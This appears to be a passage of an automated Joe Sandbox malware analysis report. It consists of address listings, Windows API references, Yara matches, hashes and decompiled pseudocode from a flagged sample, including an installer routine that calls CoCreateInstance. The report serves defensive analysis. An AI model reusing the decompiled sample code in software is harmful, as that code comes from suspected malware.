                                                                                    0x70e21dea
                                                                                    0x70e21dee
                                                                                    0x70e21e61
                                                                                    0x70e21e65
                                                                                    0x70e21c43
                                                                                    0x00000000
                                                                                    0x70e21c43
                                                                                    0x00000000
                                                                                    0x70e21e65
                                                                                    0x70e21cfd
                                                                                    0x70e21c68
                                                                                    0x70e21c6b
                                                                                    0x70e21cce
                                                                                    0x70e21cd1
                                                                                    0x70e21ce3
                                                                                    0x70e21ce3
                                                                                    0x70e21ce6
                                                                                    0x70e21df3
                                                                                    0x70e21df6
                                                                                    0x70e21df6
                                                                                    0x70e21df8
                                                                                    0x70e221ae
                                                                                    0x70e221c6
                                                                                    0x70e221c6
                                                                                    0x70e221c9
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e221b3
                                                                                    0x70e221b4
                                                                                    0x70e221b7
                                                                                    0x70e221ba
                                                                                    0x70e22244
                                                                                    0x70e2224b
                                                                                    0x70e22251
                                                                                    0x70e22255
                                                                                    0x70e21e5c
                                                                                    0x70e21e5d
                                                                                    0x70e21e5d
                                                                                    0x70e21e5e
                                                                                    0x00000000
                                                                                    0x70e21e5e
                                                                                    0x70e221c0
                                                                                    0x70e221c3
                                                                                    0x70e221c3
                                                                                    0x70e221cb
                                                                                    0x70e221ce
                                                                                    0x70e22238
                                                                                    0x70e21e51
                                                                                    0x70e21e54
                                                                                    0x70e21e57
                                                                                    0x70e21e5a
                                                                                    0x70e21e5a
                                                                                    0x00000000
                                                                                    0x70e21e5a
                                                                                    0x70e221d0
                                                                                    0x70e221d3
                                                                                    0x70e221da
                                                                                    0x70e221da
                                                                                    0x70e221dd
                                                                                    0x70e221e1
                                                                                    0x70e221f5
                                                                                    0x70e221f5
                                                                                    0x70e221f8
                                                                                    0x70e221fc
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e221fe
                                                                                    0x70e22202
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e22204
                                                                                    0x70e2220b
                                                                                    0x70e2220b
                                                                                    0x70e22211
                                                                                    0x70e22214
                                                                                    0x70e22230
                                                                                    0x70e22216
                                                                                    0x70e2221f
                                                                                    0x70e22222
                                                                                    0x70e22222
                                                                                    0x00000000
                                                                                    0x70e22214
                                                                                    0x70e221e3
                                                                                    0x70e221e6
                                                                                    0x70e221ea
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e221ec
                                                                                    0x00000000
                                                                                    0x70e221ec
                                                                                    0x70e221d5
                                                                                    0x70e221d8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e221d8
                                                                                    0x70e21dfe
                                                                                    0x70e21dfe
                                                                                    0x70e21dff
                                                                                    0x70e21f49
                                                                                    0x70e21f49
                                                                                    0x70e21f50
                                                                                    0x70e21f53
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e21f60
                                                                                    0x00000000
                                                                                    0x70e2214b
                                                                                    0x70e2214e
                                                                                    0x70e22151
                                                                                    0x70e22151
                                                                                    0x70e22152
                                                                                    0x70e22153
                                                                                    0x70e22156
                                                                                    0x70e22159
                                                                                    0x70e2215c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e2215e
                                                                                    0x70e2215e
                                                                                    0x70e22162
                                                                                    0x70e2217a
                                                                                    0x70e2217d
                                                                                    0x70e22181
                                                                                    0x70e22187
                                                                                    0x00000000
                                                                                    0x70e22187
                                                                                    0x70e22164
                                                                                    0x70e22164
                                                                                    0x70e22167
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e22169
                                                                                    0x70e2216c
                                                                                    0x70e2216e
                                                                                    0x70e2216f
                                                                                    0x70e2216f
                                                                                    0x70e2216f
                                                                                    0x70e22170
                                                                                    0x70e22173
                                                                                    0x70e22176
                                                                                    0x70e22177
                                                                                    0x70e22151
                                                                                    0x70e22152
                                                                                    0x70e22153
                                                                                    0x70e22156
                                                                                    0x70e22159
                                                                                    0x70e2215c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e2215c
                                                                                    0x00000000
                                                                                    0x70e21fa7
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e21fb3
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e21f9a
                                                                                    0x70e21f9e
                                                                                    0x70e21fa2
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e2211c
                                                                                    0x70e22120
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e22126
                                                                                    0x70e2212f
                                                                                    0x70e22136
                                                                                    0x70e2213e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e22083
                                                                                    0x70e22083
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e21fbc
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e221a6
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e2208b
                                                                                    0x70e2208d
                                                                                    0x70e2208d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e22196
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e2219a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e221a2
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e220d3
                                                                                    0x70e220d5
                                                                                    0x70e220d5
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e2209d
                                                                                    0x70e2209f
                                                                                    0x70e2209f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e220af
                                                                                    0x70e220b1
                                                                                    0x70e220b1
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e220e1
                                                                                    0x70e220e3
                                                                                    0x70e220e3
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e220ba
                                                                                    0x70e220bc
                                                                                    0x70e220bc
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e220c1
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e2219e
                                                                                    0x70e221a8
                                                                                    0x70e221a8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e220ec
                                                                                    0x70e220f0
                                                                                    0x70e220f5
                                                                                    0x70e220f8
                                                                                    0x70e220f9
                                                                                    0x70e220fc
                                                                                    0x70e22102
                                                                                    0x70e22102
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e2218e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e220c5
                                                                                    0x70e220c7
                                                                                    0x70e220c7
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e21fc3
                                                                                    0x70e21fc3
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e220da
                                                                                    0x70e220dc
                                                                                    0x70e220dc
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e21f67
                                                                                    0x70e21f6d
                                                                                    0x70e21f70
                                                                                    0x70e21f72
                                                                                    0x70e21f72
                                                                                    0x70e21f75
                                                                                    0x70e21f79
                                                                                    0x70e21f86
                                                                                    0x70e21f88
                                                                                    0x70e21f8e
                                                                                    0x70e21f8e
                                                                                    0x70e21f8e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e2208e
                                                                                    0x70e2208e
                                                                                    0x70e22090
                                                                                    0x70e22097
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e220d6
                                                                                    0x70e220d6
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e220a0
                                                                                    0x70e220a0
                                                                                    0x70e220a2
                                                                                    0x70e220a9
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e220b2
                                                                                    0x70e220b2
                                                                                    0x70e220b4
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e220e4
                                                                                    0x70e220e4
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e220bd
                                                                                    0x70e220bd
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e2210a
                                                                                    0x70e2210e
                                                                                    0x70e22113
                                                                                    0x70e22116
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e220c8
                                                                                    0x70e220c8
                                                                                    0x70e220cb
                                                                                    0x70e220cd
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e220dd
                                                                                    0x70e220dd
                                                                                    0x70e220e6
                                                                                    0x70e220e6
                                                                                    0x70e21fc5
                                                                                    0x70e21fc5
                                                                                    0x70e21fc8
                                                                                    0x70e21fcf
                                                                                    0x70e21fd1
                                                                                    0x70e21fd3
                                                                                    0x70e21fda
                                                                                    0x70e21fdd
                                                                                    0x70e21fe2
                                                                                    0x70e21fe4
                                                                                    0x70e21fe6
                                                                                    0x70e21fea
                                                                                    0x70e21ff0
                                                                                    0x70e21ff6
                                                                                    0x70e21ff6
                                                                                    0x70e21ff8
                                                                                    0x70e21ff8
                                                                                    0x70e21ff9
                                                                                    0x70e21ff9
                                                                                    0x70e21ffd
                                                                                    0x70e22003
                                                                                    0x70e22005
                                                                                    0x70e22009
                                                                                    0x70e2200e
                                                                                    0x70e2200e
                                                                                    0x70e22010
                                                                                    0x70e22010
                                                                                    0x70e22013
                                                                                    0x70e22016
                                                                                    0x70e2201f
                                                                                    0x70e22025
                                                                                    0x70e22028
                                                                                    0x70e22028
                                                                                    0x70e2202a
                                                                                    0x70e2202d
                                                                                    0x70e22033
                                                                                    0x70e22039
                                                                                    0x70e22039
                                                                                    0x70e2203b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e22041
                                                                                    0x70e22041
                                                                                    0x70e22045
                                                                                    0x70e2204c
                                                                                    0x70e22070
                                                                                    0x70e22070
                                                                                    0x70e22074
                                                                                    0x70e22076
                                                                                    0x70e22079
                                                                                    0x70e22079
                                                                                    0x70e2207c
                                                                                    0x70e2207c
                                                                                    0x00000000
                                                                                    0x70e22074
                                                                                    0x70e22051
                                                                                    0x70e22054
                                                                                    0x70e22054
                                                                                    0x70e2205b
                                                                                    0x70e2205d
                                                                                    0x70e22060
                                                                                    0x70e22067
                                                                                    0x70e22068
                                                                                    0x70e2206e
                                                                                    0x70e2206e
                                                                                    0x00000000
                                                                                    0x70e2206e
                                                                                    0x70e22062
                                                                                    0x70e22065
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e22065
                                                                                    0x70e21ff2
                                                                                    0x70e21ff4
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e21f60
                                                                                    0x70e21e05
                                                                                    0x70e21e05
                                                                                    0x70e21e06
                                                                                    0x70e21f46
                                                                                    0x00000000
                                                                                    0x70e21f46
                                                                                    0x70e21e0c
                                                                                    0x70e21e0d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e21e13
                                                                                    0x70e21e16
                                                                                    0x70e21f0b
                                                                                    0x70e21f0b
                                                                                    0x70e21f0e
                                                                                    0x70e21f23
                                                                                    0x70e21f25
                                                                                    0x70e21f25
                                                                                    0x70e21f26
                                                                                    0x70e21f29
                                                                                    0x70e21f2c
                                                                                    0x70e21f38
                                                                                    0x70e21f38
                                                                                    0x70e21f38
                                                                                    0x70e21f2e
                                                                                    0x70e21f2e
                                                                                    0x70e21f2e
                                                                                    0x70e21f3e
                                                                                    0x00000000
                                                                                    0x70e21f3e
                                                                                    0x70e21f10
                                                                                    0x70e21f10
                                                                                    0x70e21f11
                                                                                    0x70e21f1f
                                                                                    0x00000000
                                                                                    0x70e21f1f
                                                                                    0x70e21f14
                                                                                    0x70e21f15
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e21f1b
                                                                                    0x00000000
                                                                                    0x70e21f1b
                                                                                    0x70e21e1c
                                                                                    0x70e21f07
                                                                                    0x00000000
                                                                                    0x70e21f07
                                                                                    0x70e21e22
                                                                                    0x70e21e22
                                                                                    0x70e21e25
                                                                                    0x70e21e4e
                                                                                    0x00000000
                                                                                    0x70e21e4e
                                                                                    0x70e21e27
                                                                                    0x70e21e27
                                                                                    0x70e21e2a
                                                                                    0x70e21e44
                                                                                    0x00000000
                                                                                    0x70e21e44
                                                                                    0x70e21e2c
                                                                                    0x70e21e2c
                                                                                    0x70e21e2f
                                                                                    0x70e21e3e
                                                                                    0x00000000
                                                                                    0x70e21e3e
                                                                                    0x70e21e32
                                                                                    0x70e21e33
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e21e35
                                                                                    0x00000000
                                                                                    0x70e21cec
                                                                                    0x70e21cec
                                                                                    0x70e21cef
                                                                                    0x00000000
                                                                                    0x70e21cef
                                                                                    0x70e21ce6
                                                                                    0x70e21cd3
                                                                                    0x70e21cd8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e21cda
                                                                                    0x70e21cdd
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e21cdd
                                                                                    0x70e21c6d
                                                                                    0x70e21c70
                                                                                    0x70e21ca6
                                                                                    0x70e21ca9
                                                                                    0x00000000
                                                                                    0x70e21caf
                                                                                    0x70e21cb1
                                                                                    0x70e21cb5
                                                                                    0x70e21cbc
                                                                                    0x70e21cc3
                                                                                    0x70e21cc6
                                                                                    0x70e21cc9
                                                                                    0x00000000
                                                                                    0x70e21cc9
                                                                                    0x70e21ca9
                                                                                    0x70e21c72
                                                                                    0x70e21c73
                                                                                    0x70e21c8e
                                                                                    0x70e21c91
                                                                                    0x00000000
                                                                                    0x70e21c97
                                                                                    0x70e21c97
                                                                                    0x70e21c9e
                                                                                    0x70e21ca1
                                                                                    0x00000000
                                                                                    0x70e21ca1
                                                                                    0x70e21c91
                                                                                    0x70e21c78
                                                                                    0x00000000
                                                                                    0x70e21c7e
                                                                                    0x70e21c7e
                                                                                    0x70e21c85
                                                                                    0x00000000
                                                                                    0x70e21c85
                                                                                    0x70e21c78
                                                                                    0x70e21e74
                                                                                    0x70e21e79
                                                                                    0x70e21e7e
                                                                                    0x70e21e82
                                                                                    0x70e22355
                                                                                    0x70e2235b
                                                                                    0x70e21e94
                                                                                    0x70e21e96
                                                                                    0x70e21e97
                                                                                    0x70e2227e
                                                                                    0x70e2227e
                                                                                    0x70e22281
                                                                                    0x70e22284
                                                                                    0x70e222a1
                                                                                    0x70e222a7
                                                                                    0x70e222a9
                                                                                    0x70e222af
                                                                                    0x70e222c6
                                                                                    0x70e222c6
                                                                                    0x70e222c6
                                                                                    0x70e222d3
                                                                                    0x70e222d9
                                                                                    0x70e222dc
                                                                                    0x70e222e2
                                                                                    0x70e222e4
                                                                                    0x70e222e8
                                                                                    0x70e222ea
                                                                                    0x70e222f1
                                                                                    0x70e222f6
                                                                                    0x70e222f9
                                                                                    0x70e222fb
                                                                                    0x70e22300
                                                                                    0x70e22312
                                                                                    0x70e22312
                                                                                    0x70e22300
                                                                                    0x70e222f9
                                                                                    0x70e222e8
                                                                                    0x70e22318
                                                                                    0x70e2231b
                                                                                    0x70e22325
                                                                                    0x70e2232d
                                                                                    0x70e2233a
                                                                                    0x70e22340
                                                                                    0x70e22343
                                                                                    0x70e22273
                                                                                    0x70e22273
                                                                                    0x00000000
                                                                                    0x70e22273
                                                                                    0x70e22349
                                                                                    0x70e2234f
                                                                                    0x70e2234f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e22351
                                                                                    0x70e22351
                                                                                    0x70e22351
                                                                                    0x70e22351
                                                                                    0x00000000
                                                                                    0x70e2231d
                                                                                    0x70e2231d
                                                                                    0x70e22323
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e22323
                                                                                    0x70e2231b
                                                                                    0x70e222b2
                                                                                    0x70e222b8
                                                                                    0x70e222ba
                                                                                    0x70e222c0
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e222c0
                                                                                    0x70e22286
                                                                                    0x70e2228d
                                                                                    0x70e22293
                                                                                    0x70e22299
                                                                                    0x00000000
                                                                                    0x70e22299
                                                                                    0x70e21e9d
                                                                                    0x70e21e9e
                                                                                    0x70e2225d
                                                                                    0x70e2225d
                                                                                    0x70e22263
                                                                                    0x70e22266
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e2226d
                                                                                    0x70e22272
                                                                                    0x00000000
                                                                                    0x70e22272
                                                                                    0x70e21ea5
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e21eab
                                                                                    0x70e21eab
                                                                                    0x70e21eb4
                                                                                    0x70e21eb9
                                                                                    0x70e21ebf
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e21ec5
                                                                                    0x70e21ed2
                                                                                    0x70e21ed8
                                                                                    0x70e21ee2
                                                                                    0x70e21ee8
                                                                                    0x70e21ef0
                                                                                    0x70e21f00
                                                                                    0x00000000
                                                                                    0x70e21f00

                                                                                    APIs
                                                                                      • Part of subcall function 70E212BB: GlobalAlloc.KERNEL32(00000040,?,70E212DB,?,70E2137F,00000019,70E211CA,-000000A0), ref: 70E212C5
                                                                                    • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 70E21D2D
                                                                                    • lstrcpyW.KERNEL32(00000008,?), ref: 70E21D75
                                                                                    • lstrcpyW.KERNEL32(00000808,?), ref: 70E21D7F
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 70E21D92
                                                                                    • GlobalFree.KERNEL32(?), ref: 70E21E74
                                                                                    • GlobalFree.KERNEL32(?), ref: 70E21E79
                                                                                    • GlobalFree.KERNEL32(?), ref: 70E21E7E
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 70E22068
                                                                                    • lstrcpyW.KERNEL32(?,?), ref: 70E22222
                                                                                    • GetModuleHandleW.KERNEL32(00000008), ref: 70E222A1
                                                                                    • LoadLibraryW.KERNEL32(00000008), ref: 70E222B2
                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 70E2230C
                                                                                    • lstrlenW.KERNEL32(00000808), ref: 70E22326
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.15006371066.0000000070E21000.00000020.00000001.01000000.00000004.sdmp, Offset: 70E20000, based on PE: true
                                                                                    • Associated: 00000001.00000002.15006311880.0000000070E20000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.15006427903.0000000070E24000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.15006474894.0000000070E26000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_70e20000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 245916457-0
                                                                                    • Opcode ID: 5091d5ee71f669d133ed23b59eee01785837606d7f51f387e72e64ddfb134544
                                                                                    • Instruction ID: 673fe18cc4c760644a80248fb452c2bfb95a6e4e9890794e8087b49299f9b900
                                                                                    • Opcode Fuzzy Hash: 5091d5ee71f669d133ed23b59eee01785837606d7f51f387e72e64ddfb134544
                                                                                    • Instruction Fuzzy Hash: 2822BD71D04A0AEEDB11CFA4E9806AEB7F8FF1430BF2045AED167E2290D7745A81DB50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 03396101 Relevance: 5.1, Strings: 4, Instructions: 140COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14985940057.0000000003391000.00000040.00001000.00020000.00000000.sdmp, Offset: 03391000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_3391000_SecuriteInfo.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: #10$<A.$`$oS
                                                                                    • API String ID: 0-2538454973
                                                                                    • Opcode ID: 521b30e6764feec21d2b6c254cbd683ddb8683595dd4bcd2e09de61620bea746
                                                                                    • Instruction ID: 10a5205278c6c195d7ca699a1d46aa19452ed2931eaf75a97ce70bf42b65d7a8
                                                                                    • Opcode Fuzzy Hash: 521b30e6764feec21d2b6c254cbd683ddb8683595dd4bcd2e09de61620bea746
                                                                                    • Instruction Fuzzy Hash: 17418D76A05785CBEF38DE299CE63DA37D66FD6224F56412FC84A4B354C37086438B02
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004021AA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 67%
                                                                                    			E004021AA(void* __eflags) {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
				_t52 =  *(_t107 - 0x20);
				 *(_t107 - 0x50) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405FAE( *((intOrPtr*)(_t107 - 0x44))) == 0) {
					E00402DA6(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\Arthur\\AppData\\Local\\Temp");
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x38));
							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x38));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}






















                                                                                    0x004021b3
                                                                                    0x004021bd
                                                                                    0x004021c7
                                                                                    0x004021d1
                                                                                    0x004021dc
                                                                                    0x004021df
                                                                                    0x004021f9
                                                                                    0x004021fc
                                                                                    0x00402202
                                                                                    0x00402205
                                                                                    0x0040220f
                                                                                    0x00402213
                                                                                    0x00402213
                                                                                    0x00402218
                                                                                    0x00402229
                                                                                    0x00402231
                                                                                    0x004022e8
                                                                                    0x004022e8
                                                                                    0x004022ef
                                                                                    0x00402237
                                                                                    0x00402237
                                                                                    0x00402246
                                                                                    0x0040224a
                                                                                    0x0040224d
                                                                                    0x00402253
                                                                                    0x00402261
                                                                                    0x00402264
                                                                                    0x00402266
                                                                                    0x00402271
                                                                                    0x00402271
                                                                                    0x00402276
                                                                                    0x00402278
                                                                                    0x0040227f
                                                                                    0x0040227f
                                                                                    0x00402282
                                                                                    0x0040228b
                                                                                    0x0040228e
                                                                                    0x00402294
                                                                                    0x00402296
                                                                                    0x004022a0
                                                                                    0x004022a0
                                                                                    0x004022a3
                                                                                    0x004022ac
                                                                                    0x004022af
                                                                                    0x004022b8
                                                                                    0x004022be
                                                                                    0x004022c0
                                                                                    0x004022ce
                                                                                    0x004022ce
                                                                                    0x004022d1
                                                                                    0x004022d7
                                                                                    0x004022d7
                                                                                    0x004022da
                                                                                    0x004022e0
                                                                                    0x004022e6
                                                                                    0x004022fb
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004022e6
                                                                                    0x004022f1
                                                                                    0x00402c2d
                                                                                    0x00402c39

                                                                                    APIs
                                                                                    • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                                                                                    Strings
                                                                                    • C:\Users\user\AppData\Local\Temp, xrefs: 00402269
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateInstance
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp
                                                                                    • API String ID: 542301482-670666241
                                                                                    • Opcode ID: 31625dca0a94d6c1ed6869cd7bda97ffbe7ed734114103e23dc527eca7c7c38d
                                                                                    • Instruction ID: f110e38d5ccd8909b9e85e2ea6b1342c5fae2602ce40754bea02e3b472428d32
                                                                                    • Opcode Fuzzy Hash: 31625dca0a94d6c1ed6869cd7bda97ffbe7ed734114103e23dc527eca7c7c38d
                                                                                    • Instruction Fuzzy Hash: BC411771A00209EFCF40DFE4C989E9D7BB5BF49304B20456AF505EB2D1DB799981CB94
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0339F0EF Relevance: 1.7, Strings: 1, Instructions: 493COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14985940057.0000000003391000.00000040.00001000.00020000.00000000.sdmp, Offset: 03391000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_3391000_SecuriteInfo.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: LibraryLoadMemoryProtectVirtual
                                                                                    • String ID: Bpd
                                                                                    • API String ID: 3389902171-3405209732
                                                                                    • Opcode ID: cf9d6ec8666360d87e81c540137c92d41ce7ccd932af51dcfab48d87258c665e
                                                                                    • Instruction ID: 277b91fe91bf579ea15fec28f26613f22ee431fc52bbe7b822a909e72c52f292
                                                                                    • Opcode Fuzzy Hash: cf9d6ec8666360d87e81c540137c92d41ce7ccd932af51dcfab48d87258c665e
                                                                                    • Instruction Fuzzy Hash: 1D22A3716083C5CFEF35DF3888D87DA7BA2AF56310F49829AC8998F696D3348541C716
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0339DF3D Relevance: 1.3, Strings: 1, Instructions: 87COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14985940057.0000000003391000.00000040.00001000.00020000.00000000.sdmp, Offset: 03391000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_3391000_SecuriteInfo.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Nj
                                                                                    • API String ID: 0-2185558066
